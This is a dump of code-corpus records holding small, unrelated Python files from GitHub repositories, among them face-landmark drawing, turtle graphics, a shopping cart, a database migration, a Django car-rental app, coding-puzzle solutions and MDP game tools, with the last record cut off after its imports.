MIT\n\"\"\"\n\nimport sys\nimport dlib\nfrom PIL import Image, ImageDraw\n\nDETECTOR = dlib.get_frontal_face_detector()\nPREDICTOR = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\n\n# Split marks into separate features as per facial_landmarks_68markup.jpg\n# Tuple stores: start point, end point, color of line, type of line\n# We are getting to coordinates through range() so we need to get +1\n# to end point.\nFEATS = {\n 'right_brow': (17, 22, 'black', 'open'),\n 'left_brow': (22, 27, 'black', 'open'),\n 'right_eye': (36, 42, 'pink', 'close'),\n 'left_eye': (42, 48, 'pink', 'close'),\n 'face_oval': (0, 17, 'pink', 'open'),\n 'nose_bridge': (27, 32, 'pink', 'open'),\n 'nose_base': (30, 36, 'pink', 'close'),\n 'mouth_in': (60, 68, 'red', 'close'),\n 'mouth_out': (48, 60, 'red', 'close')\n }\n\ndef draw_shapes(canvas, shapes):\n \"\"\"\n Draw wired mask created from 68 landmarks.\n \"\"\"\n\n for feature in FEATS:\n coords = []\n for i in range(FEATS[feature][0], FEATS[feature][1]):\n coords.append((shapes.part(i).x, shapes.part(i).y))\n\n # We want to close some shapes and .polygon isn't good enough\n if FEATS[feature][3] == 'close':\n coords.append(coords[0])\n\n canvas.line(coords, fill=FEATS[feature][2], width=4, joint='curve')\n\n return canvas\n\ndef main():\n \"\"\"\n Main function processing images\n \"\"\"\n\n if len(sys.argv) < 2:\n raise SystemExit('Usage: Not enough arguments')\n\n\n for fname in sys.argv[1:]:\n img = dlib.load_rgb_image(fname)\n # We use source image only as source - whole drawing is done on blank\n # out_img\n in_img = Image.open(fname)\n out_img = Image.new('RGB', (in_img.width, in_img.height), 'white')\n # We will paste both images to final one to see them side by side\n final_img = Image.new('RGB', (in_img.width*2, in_img.height), 'white')\n\n # Prepare draw operations \n draw = ImageDraw.Draw(out_img)\n\n # Ask the detector to find the bounding boxes of each face.\n dets = DETECTOR(img, 1)\n for k, d in enumerate(dets):\n # Get the landmarks/parts for the face in box d.\n shape = PREDICTOR(img, d)\n # Draw wired contour on blank \n draw = draw_shapes(draw, shape)\n\n # Paste our original image and wire mask of 68 points onto background\n final_img.paste(in_img)\n final_img.paste(out_img, (in_img.width, 0))\n\n # Save output in separate directory\n fname = fname.replace('dane/', '')\n final_img.save(f'dane68/{fname}-68.jpg', 'JPEG')\n\nif __name__ == '__main__':\n main()\n","repo_name":"vvizzo/emotions","sub_path":"wired68.py","file_name":"wired68.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37128771447","text":"import math\nfrom turtle import *\n\nbgcolor(\"black\")\nshape(\"turtle\")\nspeed(0)\nfillcolor(\"brown\")\n\nphi = 137.508 * (math.pi / 180.0)\n\nfor i in range(160 + 40):\n r = 4 * math.sqrt(i)\n theta = i * phi\n x = r * math.cos(theta)\n y = r * math.sin(theta)\n penup()\n goto(x, y)\n setheading(i * 137.508)\n pendown()\n\n if i < 160:\n stamp()\n else:\n fillcolor(\"yellow\")\n begin_fill()\n right(20)\n forward(70)\n left(40)\n forward(70)\n left(140)\n forward(70)\n left(40)\n forward(70)\n end_fill()\n\nhideturtle()\nmainloop()\n","repo_name":"W4LX/Drawings-Python","sub_path":"tulip.py","file_name":"tulip.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12464427755","text":"class kart:\n def __init__(self):\n # self.inv = {'SHIRT':0,'SHOE':0}\n self.inv = {}\n # self.cost = {'SHIRT':-1,\"SHOE\":-1}\n self.cost = {}\n # self.kart = {'SHIRT':0,'SHOE':0}\n self.kart = {}\n \n def sm_add(self,item,qty):\n if int(qty) != qty or qty<=0 or item in self.inv:\n return -1\n qty = int(qty)\n self.inv[item] =qty\n return qty\n \n def sm_remove(self,item):\n if item not in self.inv:\n return -1\n del self.inv[item]\n return 1\n \n def sm_get_qty(self,item):\n if item not in self.inv:\n return 0\n return self.inv[item]\n \n def sm_inc(self,item,qty):\n if int(qty) != qty or qty<=0 or item not in self.inv:\n return -1\n qty = int(qty)\n self.inv[item]+=qty\n return qty\n \n def sm_dec(self,item,qty):\n if int(qty) != qty or qty<=0 or item not in self.inv:\n return -1\n qty = int(qty)\n self.inv[item]-=qty\n if self.inv[item] == 0:\n del self.inv[item]\n return qty\n \n def sm_set_cost(self,item,cost):\n # if item not in self.inv:\n # return -1\n\n self.cost[item] = cost\n return cost\n \n def s_add(self,item,qty):\n if int(qty) != qty or qty<=0 or item in self.kart:\n return -1\n qty = int(qty)\n self.kart[item]=qty\n return qty\n \n def s_remove(self,item):\n if item not in self.kart:\n return -1\n del self.kart[item]\n return 1\n \n def s_inc(self,item,qty):\n if int(qty) != qty or qty<=0 or item not in self.kart:\n return -1\n qty = int(qty)\n self.kart[item]+=qty\n return qty\n\n def s_dec(self,item,qty):\n if int(qty) != qty or qty<=0 or item not in self.kart:\n return -1\n qty = int(qty)\n self.kart[item]-=qty\n if self.kart[item] == 0:\n del self.kart[item]\n return qty\n \n def s_get_amount(self):\n # print(self.kart)\n # print(self.cost)\n sm = 0\n for i in self.kart:\n if i in self.kart and (i not in self.inv or i not in self.cost):\n return -1\n sm+=(self.kart[i]*self.cost[i])\n return round(sm,2)\n\nfor _ in range(int(input())):\n obj = kart()\n while True:\n s = input().split()\n if s[0] == \"END\":\n break\n if s[1] == \"SM\":\n if s[2] == \"ADD\":\n print(obj.sm_add(s[3],float(s[4])))\n elif s[2] == \"REMOVE\":\n print(obj.sm_remove(s[3]))\n elif s[2] == \"GET_QTY\":\n print(obj.sm_get_qty(s[3]))\n elif s[2] == \"INCR\":\n print(obj.sm_inc(s[3],float(s[4])))\n elif s[2] == \"DCR\":\n print(obj.sm_dec(s[3],float(s[4])))\n elif s[2] == \"SET_COST\":\n print(obj.sm_set_cost(s[3],float(s[4])))\n else:\n print(-1)\n elif s[1] == \"S\":\n if s[2] == 'ADD':\n print(obj.s_add(s[3],float(s[4])))\n elif s[2] == 'REMOVE':\n print(obj.s_remove(s[3]))\n elif s[2] == \"INCR\":\n print(obj.s_inc(s[3],float(s[4])))\n elif s[2] == \"DCR\":\n print(obj.s_dec(s[3],float(s[4])))\n elif s[2] == \"GET_ORDER_AMOUNT\":\n print(obj.s_get_amount())\n else:\n print(-1)\n ","repo_name":"VaibhavD143/Coding","sub_path":"MockVita/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40025403617","text":"\"\"\"\nMetacatalog database revision\n-----------------------------\ndate: 2021-02-05T08:48:28.689614\n\nrevision #3\n\nExtend person to have a UUID\n\n\"\"\"\nfrom sqlalchemy.orm import Session\nfrom metacatalog import api, models\nfrom uuid import uuid4\n\n\nUPGRADE_SQL = \"\"\"\n-- add columns\nALTER TABLE public.persons ADD COLUMN uuid character varying (36);\nCOMMIT;\n\"\"\"\nDOWNGRADE_SQL = \"\"\"\nALTER TABLE public.persons DROP COLUMN uuid;\nCOMMIT;\n\"\"\"\n\n# define the upgrade function\ndef upgrade(session: Session):\n # create the new column\n with session.bind.connect() as con:\n con.execute(UPGRADE_SQL)\n \n # fill any uuid that is mission\n persons = session.query(models.Person).filter(models.Person.uuid == None).all()\n for person in persons:\n person.uuid = str(uuid4())\n try:\n session.add(person)\n session.commit()\n except Exception as e:\n print('[ERROR]: %s' % str(e))\n\n\n# define the downgrade function\ndef downgrade(session: Session):\n with session.bind.connect() as con:\n con.execute(DOWNGRADE_SQL)\n\n","repo_name":"VForWaTer/metacatalog","sub_path":"metacatalog/db/revisions/rev3.py","file_name":"rev3.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"17140519219","text":"from turtle import Turtle\n\nALIGNMENT = 'center'\nFONT = (\"Courier\", 40, \"bold\")\n\n\nclass ScoreBoard(Turtle):\n\n def __init__(self):\n super().__init__()\n self.color(\"white\")\n self.dashed_line()\n self.left_score = 0\n self.right_score = 0\n self.left_player_score()\n self.right_player_score()\n\n def dashed_line(self):\n self.penup()\n self.goto(0, -280)\n self.setheading(90)\n self.width(5)\n\n draw_line = True\n while draw_line:\n if self.ycor() > 280:\n draw_line = False\n else:\n self.forward(15)\n self.hideturtle()\n self.penup()\n self.forward(15)\n self.down()\n\n def left_player_score(self):\n self.hideturtle()\n self.penup()\n self.goto(-30, 240)\n self.write(arg=f\"{self.left_score}\", move=True, align=ALIGNMENT, font=FONT)\n\n def right_player_score(self):\n self.hideturtle()\n self.penup()\n self.goto(30, 240)\n self.write(arg=f\"{self.right_score}\", move=True, align=ALIGNMENT, font=FONT)\n\n def increase_score_left(self):\n self.clear()\n self.right_player_score()\n self.dashed_line()\n self.left_score += 1\n self.hideturtle()\n self.penup()\n self.goto(-30, 240)\n self.write(arg=f\"{self.left_score}\", move=True, align=ALIGNMENT, font=FONT)\n\n def increase_score_right(self):\n self.clear()\n self.left_player_score()\n self.dashed_line()\n self.right_score += 1\n self.hideturtle()\n self.penup()\n self.goto(30, 240)\n self.write(arg=f\"{self.right_score}\", move=True, align=ALIGNMENT, font=FONT)","repo_name":"kmyutani/python_practice_projects","sub_path":"pong_game/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43684955012","text":"import math\nfrom functools import reduce\nfrom collections import deque\nimport sys\nsys.setrecursionlimit(10**7)\n\n# スペース区切りの入力を読み込んで数値リストにして返します。\ndef get_nums_l():\n return [ int(s) for s in input().split(\" \")]\n\n# 改行区切りの入力をn行読み込んで数値リストにして返します。\ndef get_nums_n(n):\n return [ int(input()) for _ in range(n)]\n\n# 改行またはスペース区切りの入力をすべて読み込んでイテレータを返します。\ndef get_all_int():\n return map(int, open(0).read().split())\n\ndef log(*args):\n print(\"DEBUG:\", *args, file=sys.stderr)\n\n# Union-Find\ndef root(i):\n if node_groups[i] == i:\n return i\n else:\n node_groups[i] = root(node_groups[i])\n return node_groups[i]\n\ndef same(a, b):\n return root(a) == root(b)\n\ndef size(i):\n return group_sizes[root(i)]\n\ndef unite(a, b):\n a = root(a)\n b = root(b)\n\n if a == b:\n return\n\n if group_ranks[a] < group_ranks[b]:\n group_sizes[b] += size(a)\n node_groups[a] = b\n else:\n group_sizes[a] += size(b)\n node_groups[b] = a\n if group_ranks[a] == group_ranks[b]:\n group_ranks[a] += 1\n\n\nn,m,k = get_nums_l()\n\nlines = list(map(lambda s: s.strip(), sys.stdin.readlines()))\nfriends = list(map(lambda s: list(map(int, s.split())), lines[:m]))\nblocks = list(map(lambda s: list(map(int, s.split())), lines[m:]))\n\n\nnodes = n+1\nnode_groups = [ i for i in range(nodes)]\ngroup_sizes = [ 1 for _ in range(nodes)]\ngroup_ranks = [ 0 for _ in range(nodes)]\n\nedges = []\nfor f in friends:\n unite(f[0], f[1])\n\ngroup_nodes = [set() for _ in range(nodes)]\nfor node in range(1, n+1):\n group_nodes[root(node)].add(node)\n\nkouho = [0] * nodes\nfor node in range(1, n+1):\n kouho[node] = (len(group_nodes[root(node)]) -1 )\n# log(\"kouhoA\", kouho)\n\nfor fr in friends:\n kouho[fr[0]] -= 1\n kouho[fr[1]] -= 1\nfor bl in blocks:\n if same(bl[0], bl[1]):\n kouho[bl[0]] -= 1\n kouho[bl[1]] -= 1\n\nprint(\" \".join(map(str, kouho[1:])))","repo_name":"mui-nyan/AtCoder","sub_path":"abc/abc157/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8179273711","text":"from typing import List\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n h = {}\n for i, num in enumerate(nums):\n print(\"I: \" + str(i))\n print(\"Num: \" + str(num))\n n = target - num\n if n not in h: # Checks if n is key in hashmap\n h[num] = i # adds to hashmap where key: Num and Value: i\n else:\n return [h[n], i]\n\n\nif __name__ == \"__main__\":\n GivenNums = [2, 7, 11, 15]\n target = 9\n ans = Solution.twoSum(Solution, GivenNums, target)\n\n'''\nNOTES\nEnumerate returns the [Index, ValueItself]\n'''","repo_name":"Cheezfri/LeetCodePractice","sub_path":"Easy Problems/Q0001_TwoSums.py","file_name":"Q0001_TwoSums.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13955134193","text":"import sys\nsys.stdin = open('input.txt', encoding='UTF-8')\n\nN = int(input())\nnums = list(map(int, input().split()))\n\nnum_sort = sorted(list(set(nums)))\n\n\nfor i in nums:\n print(num_sort.index(i), end=' ')\n\n# 이 방법도 O(n^2) 복잡도라 안 된다!","repo_name":"LeeHyeonT/TIL","sub_path":"algorithm/baekjun/220616/18870 좌표 압축/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36237243389","text":"'''\n#FILE: NUMPY TRICKS\nProject: Basic concepts in Python\n-------------------\nBy: Anh Dang\nDate: 2019-07-17\nDescription:\nSome illustrations for basic concepts in Python\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n## Change the type\narr = np.array(['1','2','3'], dtype='str')\narr = arr.astype('float')\n\n## need to use the copy, as the slice is still based on arr\narr = np.arange(10)\narr_slice = arr[5:8].copy()\narr_slice[1] = 12345\narr\n\n## Boolean mask\nnames = np.array(['Bob', 'Joe', 'Will', 'Bob', 'Will', 'Joe', 'Joe'])\nnames[names != 'Bob']\nnames[~(names == 'Bob')]\n\n## create 2-dim array \npoints = np.arange(-5, 5, 0.01)\nxs, ys = np.meshgrid(points, points) ## produce all pairs of points, spread the space\nz = np.sqrt(xs**2 + ys**2)\n\npoints.shape #1000\nxs.shape #1000x1000\n\n#plt.imshow(z, cmap=plt.cm.gray); \n#plt.colorbar()\n#plt.title(\"Image plot of $\\sqrt{x^2 + y^2}$ for a grid of values\")\n\n\n# Expressing Conditional Logic as Array Operations\nxarr = np.array([1.1, 1.2, 1.3, 1.4, 1.5])\nyarr = np.array([2.1, 2.2, 2.3, 2.4, 2.5])\ncond = np.array([True, False, True, True, False])\n[ (x if c else y) for x, c, y in zip(xarr, cond, yarr)]\n## equivalent\nnp.where(cond, xarr, yarr)\n\n\n# Mathematical & Statistical Method\narr = np.random.randn(100)\n(arr < 0).sum()\n(arr < 0).any()\n(arr < 0).all()\n\n\n# Linear Algebra\nfrom numpy.linalg import inv, qr\n\nX = np.random.randn(5, 5)\nmat = X.T.dot(X) ## X'X\ninv(mat) ## (X'X)^-1\nmat.dot(inv(mat)) ## (X'X) x (X'X)^-1\n\nq, r = qr(mat) ## QR decomposition\nq\nr\n\nseries = np.array([0,0,1,4,1,1,1])\nseries.argmax()","repo_name":"anhdanggit/portfolio-risk-finance","sub_path":"02-Basics/05-numpy.py","file_name":"05-numpy.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"31940334418","text":"from rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\n\nclass Test(APIView):\n @staticmethod\n def post(request):\n id = request.data.get('id')\n\n if not (id and id.isdigit()):\n data = dict(error=\"Bad request!\")\n return Response(data=data, status=status.HTTP_400_BAD_REQUEST)\n\n id = int(id)\n\n names = {\n 1: 'Артём',\n 2: 'Антон',\n 3: 'Артём',\n 4: 'Паша',\n 5: 'Ваня',\n }\n data = dict(status=\"Success!\", name=names.get(id))\n return Response(data=data, status=status.HTTP_200_OK)\n","repo_name":"kenigteh/udicate","sub_path":"src/api/views/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1205298255","text":"\n# https://www.hackerrank.com/challenges/collections-counter/problem?isFullScreen=true\n# Enter your code here. Read input from STDIN. Print output to STDOUT\nfrom collections import Counter\nx = int(input())\nli = list(map(int,input().split()))\nn = int(input())\nmoney = 0\nfor i in range(n):\n shoe_size = Counter(li)\n size,cost = map(int,input().split())\n if size in shoe_size:\n li.remove(size)\n money+=int(cost)\nprint(money)\n\n","repo_name":"AnushreeBaghwar/hackerRank","sub_path":"Collections counter.py","file_name":"Collections counter.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42620807156","text":"from __future__ import annotations\n\nimport argparse\n\nfrom dl_db_testing.loader import load_db_testing_lib\nfrom dl_formula_ref.generator import (\n ConfigVersion,\n ReferenceDocGenerator,\n)\nfrom dl_formula_ref.loader import load_formula_ref\n\n\nparser = argparse.ArgumentParser(prog=\"Example data management tool\")\nsubparsers = parser.add_subparsers(title=\"command\", dest=\"command\")\n\nsubparsers.add_parser(\"generate\", help=\"Generate data for examples\")\n\n\nclass ExampleDataTool:\n @classmethod\n def generate_example_data(cls):\n \"\"\"\n Requires a DB URL mapping in local file `dl_formula_ref/db_config.json`\n with the following format:\n\n {\n \"CLICKHOUSE_21_8\": \"clickhouse://datalens:qwerty@localhost:50456/formula_test\"\n }\n\n defining all the required database types:\n - CLICKHOUSE_21_8\n \"\"\"\n ref_doc_generator = ReferenceDocGenerator(locale=\"en\", config_version=ConfigVersion.default)\n ref_doc_generator.generate_example_data()\n\n print(\"Generated data successfully\")\n\n @classmethod\n def run(cls, args):\n tool = cls()\n\n if args.command == \"generate\":\n tool.generate_example_data()\n\n\ndef main():\n load_formula_ref()\n load_db_testing_lib()\n ExampleDataTool.run(parser.parse_args())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AlexRogalskiy/datalens-backend","sub_path":"lib/dl_formula_ref/dl_formula_ref/scripts/example_data.py","file_name":"example_data.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"21669454325","text":"\"\"\"\nWhen you physically exercise to strengthen your heart, you\nshould maintain your heart rate within a range for at least 20\nminutes. To find that range, subtract your age from 220. This\ndifference is your maximum heart rate per minute. Your heart\nsimply will not beat faster than this maximum (220 - age).\nWhen exercising to strengthen your heart, you should keep your\nheart rate between 65% and 85% of your heart's maximum rate.\n\"\"\"\n\n#ask person's age\nage = float(input(\"Please enter your age: \"))\n\n#perform the calculations\nrange = 220 - age\nsixty_five_percent = (65 * range) / 100\neighty_five_percent = (85 * range) / 100\n\n#print the result using an f-string\nprint(\n f\"When you exercise to strengthen your heart, you should\",\n f\"keep your heart rate between {sixty_five_percent: .0f} and {eighty_five_percent: .0f} beats per minute.\"\n)\n","repo_name":"nmelgar/CSE_111_BYUI","sub_path":"week1/heart_rate.py","file_name":"heart_rate.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73574639431","text":"from django.shortcuts import render, redirect, reverse\nfrom .forms import ReservationForm\nfrom .models import Car, Reservation, Booking\nimport datetime\n\ntoday = datetime.date.today()\n\n# Create your views here.\ndef index_view(request, *args, **kwargs):\n reservation = Reservation()\n if request.method != 'POST':\n form = ReservationForm()\n else:\n form = ReservationForm(data=request.POST)\n form.reservation_from = today\n if form.is_valid():\n reservation.reservation_from = form.cleaned_data['reservation_from']\n reservation.reservation_to = form.cleaned_data['reservation_to']\n reservation.car_seats = form.cleaned_data['car_seats']\n reservation.car_fuel = form.cleaned_data['car_fuel']\n reservation.car_transmission = form.cleaned_data['car_transmission']\n reservation.save()\n return redirect('car_rental:available_cars', reservation_id=reservation.id)\n template = 'index.html'\n context = {}\n context['form'] = form\n return render(request, template, context)\n\n\ndef available_cars_view(request, reservation_id):\n reservation = Reservation.objects.get(id=reservation_id)\n cars = Car.objects.all()\n bookings = Booking.objects.all()\n available_cars = []\n not_available_cars = []\n rental_days_amount = (reservation.reservation_to - reservation.reservation_from).days\n for booking in bookings:\n if booking.booking_from <= reservation.reservation_from <= booking.booking_to or \\\n booking.booking_from <= reservation.reservation_to <= booking.booking_to:\n if booking.booked_car.id not in not_available_cars:\n not_available_cars.append(booking.booked_car.id)\n for car in cars:\n if car.car_seats > reservation.car_seats:\n if car.id not in not_available_cars:\n not_available_cars.append(car.id)\n elif car.car_transmission != reservation.car_transmission:\n if car.id not in not_available_cars:\n not_available_cars.append(car.id)\n elif car.car_fuel != reservation.car_fuel:\n if car.id not in not_available_cars:\n not_available_cars.append(car.id)\n\n for car in cars:\n if car.id not in not_available_cars:\n available_cars.append(car)\n\n print(available_cars)\n print(not_available_cars)\n\n template = 'available_cars.html'\n context = {}\n start_date = str(reservation.reservation_from)\n end_date = str(reservation.reservation_to)\n\n try:\n # create sessions for start and end date of reservation\n request.session['start_date'] = start_date\n request.session['end_date'] = end_date\n request.session['rental_days_amount'] = rental_days_amount\n request.session['reservation_id'] = reservation.id\n\n context['available_cars'] = available_cars\n context['bookings'] = bookings\n context['reservation'] = reservation\n return render(request, template, context)\n except:\n return redirect('car_rental:index')\n\n\n\ndef car_detail(request, car_id):\n try:\n template = 'car_detail.html'\n car = Car.objects.get(id=car_id)\n\n request.session['car_id'] = car.id\n\n start_date = request.session['start_date']\n end_date = request.session['end_date']\n reservation_id = request.session['reservation_id']\n car_id = request.session['car_id']\n print(f'this is car id {car_id}')\n context = {}\n context['car'] = car\n context['start_date'] = start_date\n context['end_date'] = end_date\n context['reservation_id'] = reservation_id\n context['car_id'] = car_id\n return render(request, template, context)\n except:\n return redirect('car_rental:index')\n\n\ndef booking_view(request):\n try:\n start_date = request.session['start_date']\n end_date = request.session['end_date']\n car_id = request.session['car_id']\n car = Car.objects.get(id=car_id)\n rental_days_amount = request.session['rental_days_amount']\n rental_days_amount = int(rental_days_amount) * car.car_price_per_day\n # bookings = Booking.objects.all()\n booking = Booking()\n booking.booking_from = start_date\n booking.booking_to = end_date\n booking.booked_car = car\n booking.save()\n template = 'booking.html'\n context = {}\n context['start_date'] = start_date\n context['end_date'] = end_date\n context['car'] = car\n context['booking'] = booking\n context['rental_days_amount'] = rental_days_amount\n del request.session['start_date']\n del request.session['end_date']\n del request.session['car_id']\n return render(request, template, context)\n\n except:\n template = 'empty.html'\n context = {}\n return render(request, template, context)\n","repo_name":"djzib0/car_rental_app","sub_path":"django_project/car_rental/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26640948234","text":"import constants as c\n#This will house any functions I use in the program other than the one I use to call the orogram in main\n\n# 1 I need a function to tell me if any given number is a prime (is_prime),\n# 2 then I need a function that returns all primes in a range (calls is_prime) as a list prime_list\n\n#takes a value n and checks to see if it's prime or not\ndef is_prime(num):\n if num > 1:\n for n in range(2, num):\n if num % n != 0 and num not in c.SKIP:\n continue\n else:\n return False\n return True\n# print(is_prime(18))\n\n#uses is_prime fucntion to return a list of prime numbers when min and max are defined\ndef list_prime(min, max):\n prime_list = []\n for num in range(min, max):\n if is_prime(num):\n prime_list.append(num)\n return prime_list\n\n","repo_name":"JuicyMag/Primer-Returner","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6354679078","text":"from Web_Server.game_backend.game_data.settings import REWARDS,ACTIONS,MDP_file_path\nfrom Web_Server.game_backend.game_data.worlds import WORLDS\nimport numpy as np\nfrom math import dist\nfrom collections import namedtuple\n\n\ndef main():\n iworld = 1\n MDP = MDP_DataClass(iworld)\n\nclass Struct:\n def __init__(self, **entries):\n self.__dict__.update(entries)\n\nclass MDP_DataClass(object):\n \"\"\"\n NORMALIZE TRANSITION PROBS\n \"\"\"\n def __init__(self, iworld, init_penalties=True,MDP_path=None):\n self.iworld = iworld\n self.P_pen = REWARDS['player_Ppenalty']\n self.R_pen = REWARDS['player_Rpenalty']\n self.start = WORLDS[iworld]['start']\n S, A, T, R_player, R_evader = load_MDP() if MDP_path is None else load_MDP(MDP_path)\n\n\n # Agent Space #######################\n agent_space = {}\n agent_space['S'] = get_adm_agent_states()\n agent_space['A'] = ACTIONS['list']\n agent_space['nS'] = np.shape(agent_space['S'])[0]\n agent_space['nA'] = np.shape(agent_space['A'])[0]\n agent_space['T'] = None\n agent_space['R_player'] = R_player\n agent_space['R_evader'] = R_evader\n self.agent = Struct(**agent_space)\n\n # Joint Space #######################\n\n nS = np.shape(S)[0] # joint states\n nA = np.shape(A)[0]\n if init_penalties: R_player, Si_pen = penalty_init(iworld, S, R_player, self.P_pen, self.R_pen)\n else: self.Si_pen = None\n Si_terminal = np.array([is_caught(S[si]) for si in range(nS)]).T\n\n joint_space = {}\n joint_space['S'] = S\n joint_space['A'] = A\n joint_space['T'] = T\n joint_space['nS'] = nS\n joint_space['nA'] = nA\n joint_space['R_player'] = R_player\n joint_space['R_evader'] = R_evader\n joint_space['Si_terminal'] = Si_terminal\n\n self.joint = Struct(**joint_space)\n\n # self.S, self.A, self.T, self.R_player, self.R_evader = load_MDP()\n # if init_penalties:\n # self.R_player, self.Si_pen = penalty_init(iworld, self.S, self.R_player, self.P_pen, self.R_pen)\n # else:\n # self.Si_pen = None\n # self.Si_terminal = np.array([is_caught(self.S[si]) for si in range(self.nS)]).T\n # self.nS = np.shape(self.S)[0] # joint states\n # self.nAgents = 3\n # self.nA = np.shape(self.A)[0]\n # self.n_actions = 5 # single agent actions\n\n#########################################################################\n####### FUNCIONS+UTILS ##################################################\n\ndef penalty_init(iworld,S,R_player,P_pen,R_pen,nAgents=3):\n is_centralized = np.shape(R_player)[0]>1\n\n nS = np.shape(R_player)[0]\n world = WORLDS[iworld]['array']\n pen_states = np.array(np.where(world == WORLDS['pen_val'])).T\n Si_pen = np.zeros([nS,nAgents])\n for pen_state in pen_states:\n for player in [0,1]:\n i_pen_states = np.where(np.all(S[:, player,:] == pen_state,axis=1))\n Si_pen[i_pen_states,player]=1\n if is_centralized: R_player[i_pen_states,player] += P_pen*R_pen\n if player==0: R_player[i_pen_states] += P_pen*R_pen\n return R_player,Si_pen\n\ndef get_adm_agent_states():\n \"\"\"\n Gets admissable states of a signle agent\n :return:\n \"\"\"\n world = WORLDS['empty_world']['array']\n empty_val = WORLDS['empty_val']\n player_states = np.array(np.where(world == empty_val)).T\n return player_states\n\ndef are_adjacent(statei,statej):\n adjacent = True\n d1 = dist(statei[0], statej[0])\n d2 = dist(statei[1], statej[1])\n d3 = dist(statei[2], statej[2])\n if not(d1 == 1 or d1==0): adjacent = False\n if not(d2 == 1 or d2==0): adjacent = False\n if not(d3 == 1 or d3==0): adjacent = False\n return adjacent\ndef contains_border(world,border_val,state):\n has_border = False\n r1,c1 = state[0]\n r2, c2 = state[1]\n r3, c3 = state[2]\n if world[r1, c1] == border_val: has_border =True\n if world[r2, c2] == border_val: has_border = True\n if world[r3, c3] == border_val: has_border = True\n return has_border\ndef is_caught(state):\n caught = True\n d1 = dist(state[0], state[2]) # p1 to evader\n d2 = dist(state[1], state[2]) # p2 to evader\n if not(d1 == 1 or d1==0): caught = False\n if not(d2 == 1 or d2==0): caught = False\n return caught\ndef evader_Rdist(state):\n scale = REWARDS['evader_scale_Rdist']\n d_max = dist([1,1], [5,5])\n r_max = pow(d_max, 2) + pow(d_max, 2)\n # r_max = 64 # maximum distance across board\n d1 = dist(state[0], state[2]) # p1 to evader\n d2 = dist(state[1], state[2]) # p2 to evader\n return scale*(pow(d1,2) + pow(d2,2))/r_max\n\ndef player1_Rdist(state):\n scale = REWARDS['player_scale_Rdist']\n d_max = dist([1,1],[5,5])\n r_max = (d_max-dist([1,1],[1,1]))\n d1 = dist(state[0], state[2]) # p1 to evader\n # return scale*(d1)/r_max\n return scale * (d_max-d1)/r_max\n\n\n#########################################################################\n####### DATA MANAGEMENT #################################################\ndef save_MDP(file_name, S, A,T,R_player,R_evader,REWARDS):\n np.savez_compressed(file_name, S=S, A=A,T=T,R_player=R_player,R_evader=R_evader,REWARDS=REWARDS)\n # with open('MDP/States.pkl', 'wb') as handle:\n # pickle.dump(S, handle, protocol=pickle.HIGHEST_PROTOCOL)\n # with open('MDP\\\\States.pkl', 'wb') as handle:\n # pickle.dump(S, handle, protocol=pickle.HIGHEST_PROTOCOL)\n # with open('MDP\\\\Actions.pkl', 'wb') as handle:\n # pickle.dump(S, handle, protocol=pickle.HIGHEST_PROTOCOL)\n # with open('MDP\\\\Trans.pkl', 'wb') as handle:\n # pickle.dump(T, handle, protocol=pickle.HIGHEST_PROTOCOL)\ndef load_MDP(file_name=MDP_file_path):\n # try: loaded = np.load(file_name + '.npz')\n # except: loaded = np.load('MDP/'+file_name + '.npz')\n\n loaded = np.load(file_name + '.npz')\n return loaded['S'],loaded['A'],loaded['T'],loaded['R_player'],loaded['R_evader']\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mosmith3asu/WebServer_Project","sub_path":"Web_Server/game_backend/scripts/MDP_tools.py","file_name":"MDP_tools.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39730840730","text":"import binascii\nimport io\nimport logging\nimport zipfile\nfrom datetime import datetime\nfrom typing import Any\n\nimport docutils.core\nimport tornado.web\n\nfrom pinnwand import configuration, database, defensive, error, path, 